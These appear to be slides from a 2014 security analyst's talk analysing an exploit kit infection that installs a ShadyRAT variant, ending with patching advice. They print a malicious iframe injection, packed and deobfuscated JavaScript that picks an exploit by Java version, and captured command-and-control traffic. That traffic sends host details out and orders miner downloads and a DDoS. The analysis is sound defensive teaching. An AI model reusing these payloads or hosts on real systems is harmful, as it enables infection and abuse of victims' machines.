170 likes | 358 Views
100% All Natural Canadian Malware (much success, such cryptocurrency, wow!). LS Pulsifer Surveillance Analyst 9 April 2014. Outline. EK Overview The Righteous Client The Shady Sample Stages of Infection IDS Alerting Post-infection Symptoms Conclusion. Exploit Kit Overview.
E N D
100% All Natural Canadian Malware(much success, such cryptocurrency, wow!) LS Pulsifer Surveillance Analyst 9 April 2014
Outline • EK Overview • The Righteous Client • The Shady Sample • Stages of Infection • IDS Alerting • Post-infection Symptoms • Conclusion
Exploit Kit Overview • Pre-written attacks on specific applications • Served through redirects via trusted sites • Information gathering (plugindetect.js) • To PWN or not to PWN?
The Righteous Client • Windows 7 x86 (32 bit) • Service Pack 1 • User Account Control (UAC) Enabled • Flash 12.something (latest) • Silverlight 5.1.30214 (latest) • Google Chrome 33.something (latest) • <INSERT THE POINT OF FAILURE HERE> • Protected (reactive) by SNORT NIDS • Emerging Threat PRO Rules • Sourcefire VRT Rules
The Shady Sample • malwaredomainlist.com / urlquery.net • Sample is a variation of ShadyRAT • Operation Shady RAT: Actor widely assumed to be the People's Republic of China • http://en.wikipedia.org/wiki/Operation_Shady_RAT
Stage 1: Continued <script> document.write('<iframe src="http://mjner.com/update/"></iframe>'); </script>eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('o j=B.A("x");4(w j==\'u\'){1=j.i(/,/g,"");o n=1.l(0,2);1=1.l(3,5);4(n=="t"){9.8(c+\'q.f?h=b\'+e+\'" 6="2" a="2"></d>;\')}4(n=="v"){9.8(c+\'q.f?h=b\'+e+\'" 6="2" a="2"></d>;\')}4(n=="k"){4(1<="k"){9.8(c+\'s.f?h=7?b=\'+e+\'" 6="2" a="2"></d>;\')}m 4(1>"k"&1<="y"){9.8(c+\'z.f?b=\'+e.i(\'r\',p)+\'" 6="2" a="2"></d>;\')}m{9.8(c+\'C.f?b=\'+e.i(\'r\',p)+\'" 6="2" a="2"></d>;\')}}}',39,39,'|fin|||if||width||write|document|height|pun|filu|iframe|dertol|html||ver|replace|fullll|17|slice|else||var|shillu|old|USAR|validated|15|string|16|typeof|Java|21|pre|getVersion|PluginDetect|traditional'.split('|'),0,{}))
var fullll = PluginDetect.getVersion("Java"); if (typeof fullll == 'string') { fin = fullll.replace(/,/g, ""); var n = fin.slice(0, 2); fin = fin.slice(3, 5); if (n == "15") { document.write(filu + 'old.html?ver=pun' + dertol + '" width="2" height="2"></iframe>;') } if (n == "16") { document.write(filu + 'old.html?ver=pun' + dertol + '" width="2" height="2"></iframe>;') } if (n == "17") { if (fin <= "17") { document.write(filu + 'validated.html?ver=7?pun=' + dertol + '" width="2" height="2"></iframe>;') } else if (fin > "17" & fin <= "21") { document.write(filu + 'pre.html?pun=' + dertol.replace('USAR', shillu) + '" width="2" height="2"></iframe>;') } else { document.write(filu + 'traditional.html?pun=' + dertol.replace('USAR', shillu) + '" width="2" height="2"></iframe>;') } } }
POST /panel/gate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: www.raozat.com Content-Length: 198 Expect: 100-continue Connection: Keep-Alive crypt===gK0NXesFmbhpyQQ1CVTlFTB5UQqoHSHBTNuMDIAByM2BCM3ITMtMTRgUFUDBSKShibvVGWgkiUowWZ05WSqAiLENDIBdkVTBSZyF2dNZlKyV2cVpSQv4kK2gDegcDIzd3bk5WaXpCN0YmNhlTZmBzN5EDNjVTYmR2MhljN0UjZ2gjZmJmN5QTYwkDOmJDN HTTP/1.1 200 OK Date: Sun, 06 Apr 2014 21:35:37 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.3.28 Content-Type: text/html Content-Length: 496 ==AfwIDIwADMwYDIv02bj5yYvxWe1hWeh1mbllGZv8iOwRHdoBCdldGc0RHauM3bkRGfqMXZ5ByZtACNzITMgAXLgUHcn5SZu9GdzFmbvpGI11CI5MzMzoTbvNmLyVGdzFmZoNXYo5SZn9GZu0Wd0Fmc0N3LvoDcjR3KtVHdhJHdzBybtACdwlncjNHIh1iKgQWYvxmb39GZ/I2bsJ2Lw8SMHJkUOZUS28yclxWam9SMvkGch9Cd05SZn9yL6AHd0hGI0JXY0NnL1B3ZuIXZulWb8pyUEFURShEVgQXLgQzMyEjO0RGduUmbvR3ch52bqByTtASOzMzM602bj5iclR3chZGazFGauU2ZvRmLtVHdhJHdz9yL6A3Y0tSb1RXYyR3cg8WLgQHc5J3YzBSYtoCIkF2bs52dvR2Pi9Gbi9CMvETRzV2R5kVOvMXZslmZvEzLpBXYvQHduU2Zv8iOwRHdoBCdyFGdz5icl5WatxHdpF2d
POST /panel/gate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: www.raozat.com Content-Length: 198 Expect: 100-continue Connection: Keep-Alive crypt=42f890a496bff86f5469a3dfa5c41970fe9a6f44*Windows 7 x86*N/A*User*VMware SVGA 3D. *Intel(R) Xeon(R) CPU E3-1270 v3 @ 3.50GHz*ANALYST-PC*analyst* HTTP/1.1 200 OK Date: Sun, 06 Apr 2014 21:35:37 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.3.28 Content-Type: text/html Content-Length: 496 wait|miner.start http://ge.tt/api/1/files/9Y9GesE1/0/blob?download *-a scrypt -o stratum+tcp://stratum.doge.hashfaster.com:3339 -O jonastone.tdt:1234 -t THREADS*|miner.gpu.start http://ge.tt/api/1/files/6IFNRBG1/0/blob?download *-a scrypt -o stratum+tcp://stratum.doge.hashfaster.com:3339 -u jonastone.gpu -p 1234 -g yes*|ddos.httpget http://dienmayhuyloc.com/ 60000 20|
Conclusion • Stage one isn't so bad! • Patch your systems • Remove or UPDATE JAVA! • Don't visit shady websites • Use Chrome (req user interaction) • Watch taskmgr for rogue processes • Monitor startup processes regularly • If possible, sink known bad TLDs (.pw, .ru, .cn)